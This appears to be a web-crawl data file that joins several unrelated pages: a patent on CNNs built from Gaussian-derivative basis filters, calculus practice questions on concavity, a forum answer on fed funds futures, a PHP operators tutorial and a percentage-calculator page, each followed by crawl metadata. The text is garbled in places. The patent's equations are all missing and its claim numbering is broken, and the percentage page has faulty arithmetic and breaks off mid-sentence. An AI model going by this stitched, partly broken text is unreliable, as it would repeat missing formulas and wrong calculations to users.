image, which in this case we consider to be a function f : R2 -> R, as their input. Each convolutional layer produces feature maps as outputs by subsequent convolution with a sampled binary spatial aperture wij , application of a pooling operator and a nonlinear activation function. However, usually natural images are the sampled version of an underlying smooth function which can be sufficiently described by a set of appropriate smooth basis functions (Koenderink, structure of images). The family of Gaussian derivatives is known to be such a family of functions.\n\nWe assume, that not the simple functions expressed by the kernel’s weights wij are crucial for building invariances, but rather a learned combination of many such simple functions will exhibit the desired behaviour (Lecun Net with Bruna). For this reason we formulate the filter learning as a function approximation problem, which naturally introduces the Taylor expansion, as it can approximate any arbitrary continuous function.\n\nA convolution in the receptive field network (RFnet) is using a convolution kernel F(x; y). In a standard CNN the values F(x; y) for all pixels (x; y) in a small neighbourhood are learned (as shared weights). In a RFNetwork the kernel function is of the form F(x; y) = Gs(x; y)f(x; y) where Gs is the Gaussian function that serves as an aperture defining the local neighbourhood. It has been shown in scale space theory (see Koenderink, SOI, Ter Haar Romeny, Book) that a Gaussian aperture leads to more robust results and that is the aperture that doesn’t introduce spurious details (like ringing artefacts in images). The function f is assumed to be a linear combination of basis functions:\n\nInstead of learning function values F(x; y) (or f(x; y)) in a RFNetwork the weights  αi are learned. If we select a complete function basis we can be confident that any function F can be learned by the network. There are several choices for a complete set of basis functions that can be made. The simplest perhaps are the monomial basis functions:\n\nThese are the functions that appear in a Taylor series expansion of a function f and thus we call this basis the Taylor basis. In this case we can view the problem of learning a filter in the RFnet as a function approximation problem, where we learn an approximation of the convolution kernel F(x; y). For illustration we restrict ourselves to a first order Taylor polynomial, so then the convolution kernel is:\n\nWhere G is the Gaussian aperture with a given standard deviation σ = s and we are approximating an underlying function g(x; y). Now we define the basis Bm(x; y) and the to be learned parameters αm as follows:\n\nIncluding orders up to the power of nth in the Taylor expansion, it follows:\n\nHence, the Taylor basis can locally synthesize arbitrary functions with a spatial accuracy of σ, where the bases are constant function-kernels and the function only depends on the parameters αm. However, it is possible to choose multiple bases based on this approach. A closely related choice is the basis of the Hermite polynomials:\n\nFigure 3 shows one convolutional layer of the RFnet (not showing pooling and activation which in an embodiment are standard in our case). To the left the image I(x; y) or a feature map from a previous layer, which will be convolved with the filters in the first column. The first column displays the Hermite basis up to second order under the Gaussian aperture function. This is preprogrammed in any layer of the RFnet. In the second column Fx displays the effective filters as created by α-weighted sums over the basis functions. Note that these filters visualized here as they are effective combinations of first column, which do not exist in the RFnet at any time. Note also that basis functions can produce any desired number of different filters.\n\nIt has been shown, that any derivative of the Gaussian function, which is our aperture, can be written as the multiplication of the Gaussian function with a Hermite polynomial. Using the Hermite basis we are thus using convolution kernels that are linear combinations of Gaussian derivatives. Both the Taylor basis and the Hermite basis are complete bases: any function F can be written as a linear combination of the basis functions. The mathematical identity requires the summation of an infinite amount of basis functions. Truncating the summation sequence at say m basis functions leaves us with an approximation of the arbitrary function F.\n\nObserve that the Taylor basis and the Hermite basis are completely equivalent from a mathematical point of view. Any Hermite polynomial (up to order n) can be written as a linear combination of Taylor monomials (up to order n) and vice versa. Another basis that is often used to model the visual front-end are the Gabor functions. These are kernel functions that multiply the Gaussian aperture with sine/cosine functions of varying frequency. The learned α’s interpretation changes from bases to bases. In the Taylor series, they are the learned functions derivatives under an aperture, whereas in the Hermite polynomial they denote slightly more complex meaning. Hence the exact form of the parameters αm depends on the chosen parameterization of the basis functions. In this study we use the Hermite basis for the experiments below, as there is evidence that the receptive fields in the human visual brain can be modeled as linear combinations of Gaussian derivative functions. To show the properties of the RFnet, we use the Taylor basis, and directly apply it experimentally to approximate natural image patches in the experiment below.\n\nReferences:\n\nYoung, The Gaussian derivative model for spatial vision Koenderink, SOI Koenderink, Receptive Field Families Bart ter Haar Romeny, Front-End Vision and Multi-Scale Image Analysis Lillholm, Statistics and category systems for the shape index descriptor of local 2nd order natural image structure\n\nConvnets are typically trained with the backpropagation algorithm (see Y. LeCun, Y. Bengio, and G. Hinton. Deep learning. Nature, 2015, incorporated by reference). The gradient of the error function at the network’s output is calculated with respect to all parameters in the network by applying the chain rule and doing a layer-wise backward pass through the whole network. For convolutional neural networks, the weights to be learned are the filter kernels. Traditionally, the filter kernels are randomly initialized and updated in a stochastic gradient decent manner. In our approach, the parameters of the convolutional layers are the parameters of the taylor approximators α as shown in equation above. These taylor approximators α are learned in a mini-batch gradient decent framework.\n\nTo solve the learning problem, we need to efficiently compute the derivative of  the loss function respect to the parameters α. Taking the derivative of the loss function E with respect to the parameters α is done by applying the chain rule:\n\nHere E is the loss function. l denotes the current layer, i indexes the input feature map, j the output feature map and n indexes the neuron of the j – th feature map.\nα\nlij are the parameters between the i – th input feature map and the j – th output feature map of layer l. oljn is the n – th neural value of the j – th output feature of the layer l. tljn is output feature before the rectifier-activation function is applied to oljn (oljn = ϕ(tljn)). In an embodiment, we use the rectifier function as widely used in deep neural networks. To solve equation 4, we split it into two parts, δljn and the derivative of the convolutional function Dc. For the first part δljn, it is trivial to solve if l is the last layer. For the inner layers, by applying the chain rule,  δljn is:\n\nHere, k is the feature map index of the layer l + 1 and q is the neural index of feature map k on the layer l + 1. ϕ'(tljn) is the derivative of the activation function. In our network, rectifier function is used as the activation function. The second part of the equation 4 is only dependent on the parameters αij and can thus be calculated as follows if ol-1jn denotes the output feature map of layer l-1 (which is also the output feature of layer l), the second part of the equation can be calculated as:\n\nBm where m is an element of {1, 2, 3, …., M} denotes the irreducible basis functions of the taylor approximators up to the order M. By substituting the two terms, we are able to calculate the derivative of the error with respect to all parameters in the network. The result is as follows:\n\nThe algorithm shows how the parameters are updated.\n\nReducing number of convolutions\n\nWhen training the network, we convolve our learned filters F(x; y) with an image I(x; y). We have derived the equation for our filters parameters in ??. Due to the convolution being a linear operator, we can first convolve I(x; y) with the bases Bm and only afterwards multiply with the learned αm parameters. So we can rewrite as:\n\nThe consequence is, that by convolving the input of each layer with the basis filters (specified in number only by their order) and taking the α-weighted sum, we can effectively create responses to any number and shape of filters. This makes RFnet largely independent of number of filters present in each layer, as a summation over basis-outpts is all that is needed. This decomposition of arbitrary filters is especially beneficial for large numbers of filters per layer and big filter sizes. Considering a single convnet layer with 128 channels input, 256 channels output and a filter size of 5×5 pixels, in this case 32768 single 2D filters have to be convolved and 819200 parameters to be learned. When applying our receptive fields approach, we are able to generate 32768 effective filter responses by convolving with the inputs 1920 times, that is 128 channels each convolved with 15 basis functions upto order four. We only have to learn 491520 parameters, that is 128 channels each is 15 basis functions times 128 channel inputs times 256 outputs. The number is only needed when the full basis set of filters up to the fourth order is in use, which is often not even needed. For MNIST for instance, a second order basis suffices, which means 98304 parameters to learn for a layer of 128 * 256 filters. To conclude, our approach requires more than an order of magnitude less convolutions or even less with only roughly having half up to an eigth of the number of parameters to learn, depending on the choice of basis. This is very promising, as the convolution operations have been found to be the bottleneck in fast training of convolutional networks.\n\nExperiments\n\nWe present two experimental parts. The first focuses on comparison between four different convolutional architectures, on small datasets sampled from the MNIST-dataset (see Yann LeCun, L´eon Bottou, Yoshua Bengio, and Patrick Haffner. Gradient-based learning applied to document recognition. Proceedings of the IEEE, 86(11):2278–2324, 1998) to validate the ability of the RFnet to achieve competitive results on two object classification benchmarks, while showing more stable results on small training set sizes compared to the other approaches. The dataset sizes are chosen according to M. Ranzato, F.-J. Huang, Y-L. Boureau, and Y. LeCun. Unsupervised learning of invariant feature hierarchies with applications to object recognition. CVPR, 2007.\n\nIn the second part, we demonstrate pratical properties of the receptive fields approach. We approximate a natural image patch and benchmark the time benefit of the reduction in convolutions in an RFnet layer, compared to a classical convolutional network layer. All experiments were conducted in Theano. In the test phase, we always test on all examples of the test set and report the average error. The second dataset is the CIFAR-10 benchmark, to demonstrate classification on natural color images.\n\nImage classification with small sample sizes\n\nIn this part we compare four convolutional architectures: i) Our own RFnet, with identical setup as our own implementation of ii) a published convnet architecture (Zeiler, Hinton), iii) the best published convnet results on MNIST with small training set size without data augmentation (Lecun) and iv) the convolutional scattering network approach that excels on MNIST, as an example of a predefined convnet. To also show that the RFnet can handle natural color images, we further compare it with our convnet implementation on the CIFAR-10 benchmark with the same approach and show the differences in training for various training set sizes.\n\nThe convnet implementation and experimental setup is chosen according to Zeiler et al. and is identical for our own implementations of the RFnet and the convnet. The convnet and the RFnet consist of 3 convolutional layers, where the last convolutional layer is fully connected to the 10 softmax outputs. After each convolutional layer, max pooling with a kernel size of 3×3 and a stride of 2 is applied, subesequently followed by local response normalization and a rectified linear unit activation function. Each convolutional layer consists of 64 filter kernels, with size of 5×5 pixels each, 7×7 respectively for the RFnet to compensate for the degrading aperture. On all weights of the last layer, dropout of 0.5 was applied and on all weights of the convolutional layers dropout of 0.2. We calculate crossentropy loss as errorfunction and the network is trained for 280 epochs with adadelta. Batch size for the convnet is 100 and the learning rate 1.0 at the beginning of training, linearly decreasing for each epoch until it reaches 0.01 after 280 epochs. As the RFnet’s parameters are of different nature, we changed two parameters, we chose a batch size of 50 and a learning rate of 5.0 linearly decreasing to 0.05 after 280 epochs. The number of hermite bases. For MNIST it is 6 for all layers. For Cifar-10 we chose a basis of 10 in the first layer and a basis of 6 for all other layers. The architecture were trained on CIFAR-10 and MNIST with various training set sizes. The obtained results of the convnet are in line with the results reported in the original reference (M. D. Zeiler and R. Fergus. Stochastic pooling for regularization of deep convolutional neural networks. ICLR, 2013).\n\nFigures 4a and 4b show both architectures trained on 300 randomly selected samples of MNIST and 300 randomly selected samples of CIFAR-10 on the bottom and trained on the full training sets on the top. The RFnet is much more stable and directly starts to converge for small training set sizes on both datasets. In comparison, the convnet remains at random predictions for a number of epochs, before it starts to converge. Furthermore, the final predictions are more accurate for the RFnet for small sample size. Training on the full set converges somewhat slower for the RFnet compared to the convnet. However, the final accuracy after 280 epochs is very similar, slightly worse for MNIST and slightly better for CIFAR-10.\n\nFigure 6 illustrates the filters before and after trainingon MNIST.\n\nPractical properties of the Receptive Fields Network\n\nThe second part focuses on the properties of the receptive fields, namely their expressiveness and computational efficiency. We benchmark a standard convolutional layer for a forward and backwards pass, compared to an RFnet layer with the same number of feature maps and vary size, as well as number of convolution kernels. Furthermore we approximate natural image patches with a Taylor basis, to literally illustrate the expressiveness of our approach. The size and the number of convolution kernels varies as indicated.\n\nFor the timing experiment we use 96×96 input images with 32 input channels, convolved with 64 filters where we vary the kernel size as 6σ, after which the Gaussian aperture tends to zero. To best show our theoretical improvement, we measure computation time on the cpu. In figure 5 we illustrate that our approach is less sensitive to the filter kernel size. In a RFNet, the number of convolutions depends on the order of the function basis, not on the number of pixels in a particular filter. Figure 5 shows Computation time vs the size of the convolution filter. Note that RFNets depend mostly on the order of the function basis.\n\nFigure 6 shows RFNet filters before (left) and after training (right) for 2 epochs on MNIST. Note how our filters adapt to the task, and exhibit smooth contours already after two epochs of training.\n\nIt will also be clear that the above description and drawings are included to illustrate some embodiments of the invention, and not to limit the scope of protection. Starting from this disclosure, many more embodiments will be evident to a skilled person. These embodiments are within the scope of protection and the essence of this invention and are obvious combinations of prior art techniques and the disclosure of this patent.\n\nClaims\n\n1. A method for recognition of information in digital image data, said method comprising a learning phase on a data set of example digital images having known information, and computing characteristics of categories automatically from each example digital image and comparing computed characteristics to their known category, said method comprises in said learning phase training a convolutional neural network comprising network parameters using said data set, in which in said learning phase via deep learning each layer of said convolutional neural network is represented by a linear decomposition into basis functions of all filters as learned in each layer.\n2. The method of claim 1, wherein the network parameters of the convolutional layers are parameters expressing the weights of each member in a set of basis functions selected from a Taylor expansion and a Hermite expansion, for providing approximators for a local image structure by adapting said network parameters during training.\n3. The method of any one of the preceding claims, further comprising preprograming the basis functions in the network as Gaussian-shaped filters to decompose the filters.\n4. The method of any one of the preceding claims, comprising using a receptive field network (RFnet) including a convolution kernel F(x; y) of the form F(x; y) = Gs(x; y)f(x; y), where Gs is a Gaussian function that serves as an aperture defining the local neighborhood.\n5. The method of any one of the preceding claims, wherein a set of monomial basis functions:\n\nare used for the learning function values, or functionally simpler functions that turn up in a Taylor series expansion of the function f.\n\n1. The method of any one of the preceding claims, wherein the to be learned parameters αm as follows:\n\nwhere the derivatives f at that position with index indicating their order are measured by the Gaussian linear filter of the same derivative order.\n\n1. A method for recognition of categorical information from digital image data, said method comprising providing a trained neural network, trained using the method  of any one of the preceding claims.\n1. A device for recognition of categorical information from digital image data, comprising a computer system comprising a computer program product with, when running on said computer system, applies a trained neural network derived according to the method of any one of the preceding claims.\n2. A computer program product which, when running on a data processor, performs the method of any one of the preceding claims.\n3. A method for recognition of information in digital image data, said method comprising deriving a convolutional neural network architecture based on receptive field filter family as a basis to approximate arbitrary functions representing images by at least one selected from Taylor expansion, and Hermite functional expansion.\n4. A computer program product for classification of data having local coherence, in particular spatial coherence, for instance data selected from images, time series, and speech data, said computer program product comprising a deep receptive field network, comprising a filter kernel comprising a linear combination of basis functions.\n5. A computer program product for classification of data having local coherence, in particular spatial coherence, for instance data selected from images, time series, and speech data, said computer program product comprising a deep convolutional neural network comprising receptive field functions, wherein said receptive field functions comprise a linear combination of functional complete basis functions.\n6. The computer program product of claims 11 or 12, wherein said neural network comprise weights that are learnt using a sample dataset, in particular said weights are learned for a whole patch at once.\n7. The computer program product of claims 11 or 12 or 13, wherein said neural network comprises a or said kernel that is a linear combination of basis functions:wherein in particular ϕ\ni is a complete set of basis functions, with the parameters of the convolutional layers are the parameters of the parameters α.\n\n-o-o-o-o-o-\n\nAbstract\n\nThe invention provides a method for recognition of information in digital image data, said method comprising a learning phase on a data set of example digital images having known information, and characteristics of categories are computed automatically from each example digital image and compared to its known category, said method comprises training a convolutional neural network comprising network parameters using said data set, in which via deep learning each layer of said convolutional neural network is represented by a linear decomposition of all filters as learned in each layer into basis functions." ]
[ null, "http://vanessenpatent.nl/wp-content/uploads/2017/05/6P100218PC00_ToPTO_Drawings_20160603-2-802x1024.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9051168,"math_prob":0.92206985,"size":52307,"snap":"2020-24-2020-29","text_gpt3_token_len":10313,"char_repetition_ratio":0.16360438,"word_repetition_ratio":0.2993405,"special_character_ratio":0.18800543,"punctuation_ratio":0.0976033,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9573597,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-12T15:04:01Z\",\"WARC-Record-ID\":\"<urn:uuid:0b19c82a-6dc3-4f4e-b144-602a73c13c83>\",\"Content-Length\":\"75351\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1987eae1-1610-43a1-a226-76269dcdc65f>\",\"WARC-Concurrent-To\":\"<urn:uuid:f8e0107f-5f22-4496-948c-512b05fa6869>\",\"WARC-IP-Address\":\"185.104.29.30\",\"WARC-Target-URI\":\"https://vanessenpatent.nl/project/deepreceptivefields/\",\"WARC-Payload-Digest\":\"sha1:V5HJE76G2RQKXYE5QLEN47NVQLQOFJZU\",\"WARC-Block-Digest\":\"sha1:CWLQFJW2TI7OQFL6W3VKK4PMM4IAYJEQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657138752.92_warc_CC-MAIN-20200712144738-20200712174738-00303.warc.gz\"}"}
https://brilliant.org/practice/concave-convex-functions/?subtopic=applications-of-differentiation&chapter=extrema
[ "", null, "Calculus\n\n# Concave / Convex Functions\n\nWhat is the inflection point of the curve $y=x^3-3x^2+7x+12?$\n\nWhat is the maximum value of real number $a$ such that the curve $y=x^2(\\ln x-13)$ is concave down in the interval $(0,a)?$\n\nIf $f(x) = \\ln (x^2 + 9)$, the interval on which the curve $y = f(x)$ is concave up can be expressed as $a < x < b$. What is the value of $b - a$?\n\nIf $f(x) = x^4 - 32 x^3 + 288 x^2 + 8x - 15$, the interval on which the curve $y = f(x)$ is concave down can be expressed as $a < x < b$. What is the value of $a + b$?\n\nLet $f(x) = x^4 - 40 x^3 + 504x^2 + 19x + 17$. Given that $f(x)$ is concave in the domain $\\left[a,b\\right]$, what is the value of $a+b$?\n\n×" ]
[ null, "https://ds055uzetaobb.cloudfront.net/brioche/chapter/Extrema-3c7rMs.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9066712,"math_prob":1.00001,"size":559,"snap":"2021-43-2021-49","text_gpt3_token_len":132,"char_repetition_ratio":0.15495495,"word_repetition_ratio":0.37962964,"special_character_ratio":0.24150269,"punctuation_ratio":0.18897638,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.00001,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-07T05:19:26Z\",\"WARC-Record-ID\":\"<urn:uuid:97cf1a65-38c6-4fd6-a552-760305d77a23>\",\"Content-Length\":\"89916\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:87372f48-b46c-4e68-987c-e07e6e173e09>\",\"WARC-Concurrent-To\":\"<urn:uuid:964d8c7b-6650-4f1e-a9e8-6172b2343660>\",\"WARC-IP-Address\":\"104.18.9.15\",\"WARC-Target-URI\":\"https://brilliant.org/practice/concave-convex-functions/?subtopic=applications-of-differentiation&chapter=extrema\",\"WARC-Payload-Digest\":\"sha1:V4AV3LNPF3YGL63O3TK5DEMZRYQZDDU4\",\"WARC-Block-Digest\":\"sha1:NXWZZSFJLXWDMJZ3DURRF5HSAEJRMHCD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363336.93_warc_CC-MAIN-20211207045002-20211207075002-00354.warc.gz\"}"}
https://www.analystforum.com/t/use-of-derivatives-to-infer-market-expectations-reading-16-eoc-q10/142087
[ "# Use of derivatives to infer market expectations(Reading 16 EOC Q10)\n\nHi. I’m having a difficult time understanding the solution to the question below, specifically why they calculate the probability for a 25bps rate hike?\n\n“Sarah Ko, a private wealth adviser in Singapore, is developing a short-term interest rate forecast for her private wealth clients who have holdings in the US fixed-income markets. Ko needs to understand current market expectations for possible upcoming central bank (i.e., US Federal Reserve Board) rate actions. The current price for the fed funds futures contract expiring after the next FOMC meeting is 97.175. The current federal funds rate target range is set between 2.50% and 2.75%”\n\nIn the solution they assume that the new range will be 25bps higher as follows;\n\n\"Ko should determine the probability of a rate change. She knows the 2.825% FFE rate implied by the futures signals a fairly high chance that the FOMC will increase rates by 25 bps from its current target range of 2.50%–2.75% to the new target range of 2.75%–3.00%.\n\nWhy do they make that assumption of 25bps? Its not in the question. Why not a 30 or 40 bps hike assumption?\n\n25 bps is a convention for rate range widths, and also a common assumption the market uses when predicting target rate adjustments. This is because the FOMC makes moves in 25 bps increments or multiples thereof. Here the implied FFE is 2.825% so the expected new rate range would be 2.75% to 3% (capturing the 2.825% inside it). Because that is the 25 bps range covering the implied rate here.\n\nThat’s also why you see the original target range in the problem was 2.5%-2.75% (25 bps).\n\nFor a more detailed explanation you can read here:\n\nhttps://www.cmegroup.com/education/demos-and-tutorials/fed-funds-futures-probability-tree-calculator.html#\n\nOn a mock exam they may ask, for example, whether it is likely or unlikely the Fed will adjust rates 25 bps. In that case you just run the formula to determine that probability. If the FFE implied rate from futures is greater than a 25 bps difference, then you can calculate the probability of the new change to that larger rate range up/down (which still will land at a range 25 bps in width regardless, by convention). The new target range will be whatever the 25 bps range is that encaptures the implied rate, and you can calculate the probability of that change happening by using the formula.\n\nFolks often think of 25 bps adjustments up/down in typical scenario. But the width of the target rate range is always 25 bps regardless. So if the implied rate in futures is 2.8%, the predicted target rate range can be 2.75-3%. If the implied rate is 3.1%, the predicted target rate range can be 3-3.25%. To calculate the probabilities of that predicted target rate range happening, run the formula.\n\nCheers - you got this", null, "2 Likes\n\nWell explained. Thank you.\n\n1 Like" ]
[ null, "https://www.analystforum.com/images/emoji/twitter/+1.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90847605,"math_prob":0.9748042,"size":2801,"snap":"2022-27-2022-33","text_gpt3_token_len":673,"char_repetition_ratio":0.14980336,"word_repetition_ratio":0.021367522,"special_character_ratio":0.24205641,"punctuation_ratio":0.11072665,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9861898,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-27T02:37:14Z\",\"WARC-Record-ID\":\"<urn:uuid:d2a01c5c-acaa-4730-96a5-2c817c40fc75>\",\"Content-Length\":\"24173\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c3afff60-86e6-4db5-8614-4364b819e8e4>\",\"WARC-Concurrent-To\":\"<urn:uuid:cf7410f7-c674-4fab-af1a-63b39d1ece8f>\",\"WARC-IP-Address\":\"45.79.51.137\",\"WARC-Target-URI\":\"https://www.analystforum.com/t/use-of-derivatives-to-infer-market-expectations-reading-16-eoc-q10/142087\",\"WARC-Payload-Digest\":\"sha1:JNQ64M5D4KXL75B5KCO6T5F4FKZXNKQC\",\"WARC-Block-Digest\":\"sha1:RC5YEDVCBEQGAZ2NG3AQELKKS73XSLHX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103324665.17_warc_CC-MAIN-20220627012807-20220627042807-00228.warc.gz\"}"}
https://etutorialspoint.com/index.php/tutorial/php-operators
[ "# PHP 8 Operators\n\nAn operator in a programming language is a symbol or phrase that tells the compiler or interpreter to perform specific mathematical, relational or logical operation and produce final output. It takes one or more arguments and produces a new value. By using operators, we can perform various operations on variables and constants.\n\n## Types of operators in PHP\n\nThere are three types of operators in PHP:\n\n• Unary Operators\n• Binary Operators\n• Ternary Operator\n\n## Unary Operators\n\nUnary Operators take only one value. In mathematics, a unary operation is an operation with only one operand, i.e., a single value to produce a new value. Types of unary operators -\n\n Operator Name Example ++ Increment \\$a++ // post increment \\$a ++\\$a // pre increment \\$a -- Decrement \\$a-- // post decrement \\$a value --\\$a // pre decrement \\$a value ! Logical Negation !\\$a // True if \\$a evaluates to False.\n\nExamples of Unary operators\n``````<?php\n\\$var = 10;\necho \\$var++;\necho '<br/>';\necho ++\\$var;\necho '<br/>';\necho \\$var--;\necho '<br/>';\necho --\\$var;\necho '<br/>';\nif(!isset(\\$a)){\necho 'variable \\$a is not set';\n}\n?>``````\n\n## Binary Operators\n\nA binary operator works on two operands and manipulates them to return an output. PHP has the following types of binary operators.\n\n### Arithmetic Operators\n\nArithmetic operators work on only two numeric operands to perform common arithmetical operations, such as addition, subtraction, multiplication etc. If the operands are not numeric, then it automatically converts to numeric.\n\n Operator Name Example + Addition \\$a+\\$b - Subtraction \\$a-\\$b * Multiplication \\$a*\\$b / Division \\$a/\\$b % Modulus \\$a%\\$b\n\nExamples of arithmetic operators\n``````<?php\n\\$a = 10; \\$b = 12;\necho \\$a + \\$b.'<br/>';\necho \\$a - \\$b.'<br/>';\necho \\$a * \\$b.'<br/>';\necho \\$a / \\$b.'<br/>';\necho \\$a % \\$b.'<br/>';\n?>\n``````\n\n### Assignment Operators\n\nAssignment operators are used to assign a value to a variable, x = 10 is a simple assignment operator that assigns the value 10 on the right to the variable x on the left.\n\n Operator Example Description = \\$a = 2; It assigns the right operand value to the left operand. += \\$a += 2; // same as \\$a = \\$a+2; It adds both operands and assigns the result to the first operand. -= \\$a -= 2; // same as \\$a = \\$a-2; It subtracts both operands and assigns the result to the first operand. *= \\$a *= 2; // same as \\$a = \\$a*2; It multiply both operands and assigns the result to the first operand. /= \\$a /= 2; // same as \\$a = \\$a/2; It divides left operand to the right and assigns the result to the first operand. %= \\$a %= 2; // same as \\$a = \\$a%2; It takes modules and assigns the result to the first operand.\n\nExamples of assignment operators\n``````<?php\n\\$a = 10;\necho \\$a += 2;\necho '<br/>';\necho \\$a -= 2;\necho '<br/>';\necho \\$a *= 2;\necho '<br/>';\necho \\$a /= 2;\necho '<br/>';\necho \\$a %= 2;\n?>\n``````\n\n### Logical Operators\n\nThese operators are used to perform logical operations. It returns the result in always a boolean value. It allows a program to make a decision based on multiple conditions.\n\n Operator Name Example && AND \\$var && \\$var2; // Logical AND between \\$var and \\$var2 || OR \\$var || \\$var4; // Logical OR between \\$var and \\$var4 ^ XOR \\$var^\\$var1; ! NOT !(\\$var && \\$var3);\n\n### Comparison Operators\n\nComparison operators are used for comparison. Comparison operators compare two values in an expression that resolves to a value of true or false. Its result is always a boolean value. In computer programming, it is generally used in conditional expressions to determine which block of code executes, thus controlling the program flow.\n\n Operator Name Example == Equal to \\$a == \\$b; // check the equality between both \\$a and \\$b. === Identical to \\$a === \\$b; // if value and datatype of both operands are equal then it returns true. != Not equal to \\$a != \\$b; //If the value of both operands are not equal, then it returns true, otherwise it returns false. < Less than \\$a < \\$b; //If the value of left operand is less than the right operand than it returns true. > Greater than \\$a > \\$b; //If the value of left operand is greater than the right operand than it returns true. >= Greater than equal to \\$a >= \\$b; //If the value of left operand is greater than or equal to the right operand than it returns true. <= Less than equal to \\$a <= \\$b; //If the value of left operand is less than or equal to the right operand than it returns true.\n\n### String Operators\n\nString operators are performed on the string.\n\n Operator Name Example . Concatenation \\$a.\\$b; // It concatenates two strings. .= Assign concatenation \\$a .= \\$b; // It concatenates \\$a and \\$b strings and assigns to the first string.\n\n``````<?php\n\\$str1 = 'Hello John';\n\\$str2 = 'How are you?';\necho \\$str1.\\$str2.'<br/>';;\necho \\$str1.=\\$str2;\n?>\n``````\n\n### Array Operators\n\nArray operators are used to compare arrays. Elements of arrays are equal for the comparison if they have the same key and value.\n\n Operator Name Example == Equal to \\$a == \\$b; // It returns true if both arrays have same key/value pair. === Identical to \\$a === \\$b; // It returns TRUE if both arrays have the same data types in the same order and same key/value pair. != Not equal to \\$a != \\$b; // It returns TRUE if array \\$a is not equal to array \\$b. <> Inequality \\$a <> \\$b; // It returns TRUE if array \\$a is not equal to array \\$b.\n\n## Ternary Operator\n\nTernary Operator works on truth expression. It takes three operands - a condition, a result statement for true and a result statement for false. That's why it is called a ternary operator.\n\nSyntax of Ternary Operator\n\n``(expression)? statement1 : statement2;``\n\nIn the above syntax, if the expression is true, then statement1 is executed, otherwise statement2 is executed.\n\nExample\n\n``````<?php\n\\$day = 1;\n\\$message = (\\$day == 5)?'Today is Holiday' : 'Today is working day';\necho \\$message;\n?>\n``````\n\n## PHP 7 Null coalescing\n\nIn PHP 7, a new null coalescing operator (??) has been introduced. It returns the first value only if it exists and not set to null otherwise it returns the other value.\n\nSyntax of Null coalescing\n\n``\\$x = statement1 ?? statement2;``\n\nIn the above syntax, if the statement1 exists and is not null then it returns statement1 otherwise it returns statement2.\n\nExample\n\n``\\$name = \\$_GET[\"name\"] ?? \"Priska\";``\n\nPractice Exercises" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.67686343,"math_prob":0.9830467,"size":6211,"snap":"2023-40-2023-50","text_gpt3_token_len":1688,"char_repetition_ratio":0.16932495,"word_repetition_ratio":0.1300738,"special_character_ratio":0.30059573,"punctuation_ratio":0.14747307,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9960207,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-04T20:12:10Z\",\"WARC-Record-ID\":\"<urn:uuid:35453b88-9a42-45da-93fc-39c674b8b1c0>\",\"Content-Length\":\"74410\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ee324b37-bdad-49f3-9196-c9420aa81eba>\",\"WARC-Concurrent-To\":\"<urn:uuid:95af5b49-d673-4df7-8efe-bfadecbf910f>\",\"WARC-IP-Address\":\"166.62.27.168\",\"WARC-Target-URI\":\"https://etutorialspoint.com/index.php/tutorial/php-operators\",\"WARC-Payload-Digest\":\"sha1:XKPXSLHSNMCY32TYEPLM55Q627NTASYC\",\"WARC-Block-Digest\":\"sha1:XKMKXO4AIF5TM6CWGA5VXD27Q7EHBILD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511406.34_warc_CC-MAIN-20231004184208-20231004214208-00564.warc.gz\"}"}
https://whatpercentcalculator.com/85-is-4-percent-of-what-number
[ "# 85 is 4 percent of what number?\n\n## (85 is 4 percent of 2125)\n\n### 85 is 4 percent of 2125. Explanation: What does 4 percent or 4% mean?\n\nPercent (%) is an abbreviation for the Latin “per centum”, which means per hundred or for every hundred. So, 4% means 4 out of every 100.\n\n### Methods to calculate \"85 is 4 percent of what number\" with step by step explanation:\n\n#### Method 1: Diagonal multiplication to calculate \"85 is 4 percent of what number\".\n\n1. As given: For 4, our answer will be 100\n2. Assume: For 85, our answer will be X\n3. 4*X = 100*85 (In Steps 1 and 2 see colored text; Diagonal multiplications will always be equal)\n4. X = 100*85/4 = 8500/4 = 2125\n\n#### Method 2: Same side division to calculate \"85 is 4 percent of what number\".\n\n1. As given: For 4, our answer will be 100\n2. Assume: For 85, our answer will be X\n3. 100/x = 4/85 (In Step 1 and 2, see colored text; Same side divisions will always be equal)\n4. 100/X = 4/85 or x/100 = 85/4\n5. X = 85*100/85 = 8500/4 = 2125\n\n### Percentage examples\n\nPercentages express a proportionate part of a total. When a total is not given then it is assumed to be 100. E.g. 85% (read as 85 percent) can also be expressed as 85/100 or 85:100.\n\nExample: If 85% (85 percent) of your savings are invested in stocks, then 85 out of every 100 dollars are invested in stocks. If your savings are \\$10,000, then a total of 85*100 (i.e. \\$8500) 